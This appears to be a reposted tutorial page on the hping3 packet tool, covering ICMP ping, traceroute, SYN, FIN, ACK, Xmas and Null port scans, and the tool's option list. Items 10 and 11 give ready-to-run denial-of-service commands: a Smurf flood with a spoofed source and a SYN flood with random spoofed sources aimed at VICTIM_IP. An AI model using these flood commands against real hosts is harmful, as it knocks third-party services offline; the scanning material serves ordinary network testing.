hping 详解_hping3 详解
hping3的用法
详细介绍:
hping3的使用方法
1. Testing ICMP: In this example hping3 will behave like a normal ping utility, sending ICMP-echo und receiving ICMP-reply
hping3 -1 0daysecurity.com
2. Traceroute using ICMP: This example is similar to famous utilities like tracert (windows) or traceroute (linux) who uses ICMP packets increasing every time in 1 its TTL value.
hping3 --traceroute -V -1 0daysecurity.com
3. Checking port: Here hping3 will send a Syn packet to a specified port (80 in our example). We can control also from which local port will start the scan (5050).
hping3 -V -S -p 80 -s 5050 0daysecurity.com
4. Traceroute to a determined port: A nice feature from Hping3 is that you can do a traceroute to a specified port watching where your packet is blocked. It can just be done by adding --traceroute to the last command.
hping3 --traceroute -V -S -p 80 -s 5050 0daysecurity.com
5. Other types of ICMP: This example sends a ICMP address mask request ( Type 17 ).
hping3 -c 1 -V -1 -C 17 0daysecurity.com
6. Other types of Port Scanning: First type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally firewalls send a RST+ACK packet back to signal that the port is closed..
hping3 -c 1 -V -p 80 -s 5050 -F 0daysecurity.com
7. Ack Scan: This scan can be used to see if a host is alive (when Ping is blocked for example). This should send a RST response back if the port is open.
hping3 -c 1 -V -p 80 -s 5050 -A 0daysecurity.com
8. Xmas Scan: This scan sets the sequence number to zero and set the URG + PSH + FIN flags in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP Xmas scan, sending no reply.
hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF 0daysecurity.com
9. Null Scan: This scan sets the sequence number to zero and have no flags set in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP NULL scan, sending no reply.
hping3 -c 1 -V -p 80 -s 5050 -Y 0daysecurity.com
10. Smurf Attack: This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.
hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
11. DOS Land Attack:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP
--flood: sent packets as fast as possible. Don't show replies.
--rand-dest: random destionation address mode. see the man.
-V
-c --count: packet count
-d --data: data size
-S --syn: set SYN flag
-w --win: winsize (default 64)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-s --baseport: base source port (default random)
Anex A Hping3 Help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set dont fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum many systems will fix the IP checksum sending the packet so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)
hping 详解_hping3 详解相关推荐
- 详解Python序列解包(5)
如果一个函数需要以多种形式来接收参数,定义时一般把位置参数放在最前面,然后是默认值参数,接下来是一个星号的可变长度参数,最后是两个星号的可变长度参数:调用函数时,一般也按照这个顺序进行参数传递.调用函 ...
- 详解Python序列解包(4)
本文主要介绍调用函数传递参数时序列解包的用法.在定义函数时在形参前面加2个星号**表示可变长度参数,可以收集若干关键参数形式的参数传递并存放到一个字典之中.与之相对,如果实参是个字典,可以使用两个星号 ...
- 详解Python序列解包(3)
本文主要介绍调用函数传递参数时序列解包的用法.在调用函数传递参数时,可以在实参序列前加一个星号*进行序列解包,或在实参字典前加两个星号**进行解包,本文介绍第一种用法,第二种用法后面再单独发文介绍. ...
- linux内核如何读写ddr,linux内核解压详解.doc
linux内核解压详解 Description: /*?OldLinux论坛 -- 有关早期Linux内核代码发展的论坛. 9!%83gY* ?linux/arch/arm/boot/compress ...
- FreeRTOS笔记(四):任务创建/删除,挂起/解挂详解
FreeRTOS笔记(四):任务创建/删除,挂起/解挂详解 在第二篇笔记中介绍了任务创建的API,并且简单使用了相关API,本文将详细介绍任务创建的过程. 一.任务创建 任务创建步骤为: 1.创建任务 ...
- 深度学习网络模型——Vision Transformer详解 VIT详解
深度学习网络模型--Vision Transformer详解 VIT详解 通用深度学习网络效果改进调参训练公司自己的数据集,训练步骤记录: 代码实现version-Transformer网络各个流程, ...
- Linux常用命令——解/压缩,解/打包
文章目录 Linux的解/压缩.解/打包命令详解 1.".zip"格式 压缩 解压 2.".gz"格式 压缩 解压 3.".bz2"格式 压 ...
- python教程:dict字典常用方法总结,数据解构(解包)
dict {'name':'holle'}字典存储大量关联型数据,可迭代的,最多只有200个键.查询数据速度非常快,符合二分查找(有100个数比如找75会先找到50然后判断,所以2^7次方7次即可找到 ...
- linux下 tar解压 gz解压 bz2等各种解压文件使用方法
点击打开链接 linux下 tar解压 gz解压 bz2等各种解压文件使用方法 .tar 解包:tar xvf FileName.tar 打包:tar cvf FileN ...
- vivo解bl锁_mi8 8SE 小米8解帐户锁 解ID锁 解激活锁
小米 6 note3 红米note5 mix2s mix2 红米S2 平板4/4P小米8帐户锁 解锁刷机包 激活锁可解ID 需解bl可以登录小米帐号可以使用云服务屏蔽官方在线升级可以恢复出厂不反锁,小 ...
最新文章
- love2d杂记9--光照效果
- 多布局怎么搭建_小展位大吸引力,如何设计搭建出精致的展台?
- JACK——TeamsManual3 Roles
- 数据科学家十年后彻底消失?25年行业元老:无稽之谈!
- 在Linux下用netstat查看网络状态、端口状态
- 短信怎么控制modbus设备?
- Django使用mysql连接池_Django db使用MySQL连接池
- 基于注意力机制的seq2seq网络
- android手机连接PC后怎样切换为U 盘模式
- 19-7/8作业:模拟实现用户密码管理
- Swift常用第三方库
- 内核里面writel(readl)是如何实现的
- 音视频转换器哪个好?嗨格式视频转换器来了
- python 找图 找字_使用按键精灵找点找图找字的方法
- SpringBoot整合Mail
- 使用Docker发布DNC项目
- java servlet 返回404_Servlet返回“HTTP状态404请求的资源(/ servlet)不可用”
- 服务器2012系统如何备份数据库备份,windows 2012服务器数据库备份
- 获取硬盘的smart信息
- 低门槛,多玩法打金游戏 Tiny World
热门文章
- 110道 MySQL面试题及答案 (持续更新)
- Android搜索关键字高亮显示
- 将Chrome浏览器默认保存离线网页为“多个文件”设置为“单个文件”即单个mhtml文件
- 高通工具过滤_高通QXDM|高通诊断监视工具(Qualcomm QXDM)下载v3.14 官方版 - 欧普软件下载...
- angular框架的SmartAdmin模板 如何请求后台数据
- 基于android课设报告,基于android的简单用户注册系统课程设计报告.doc
- mdt 计算机名_MDT通过PowerShell脚本自定义变量(自定义计算机名)
- 程序员做饭指南,GitHub教程来了
- Java开发求职总结
- win7便笺重启计算机后还有吗,win7里的便签功能关机重启电脑后还有吗?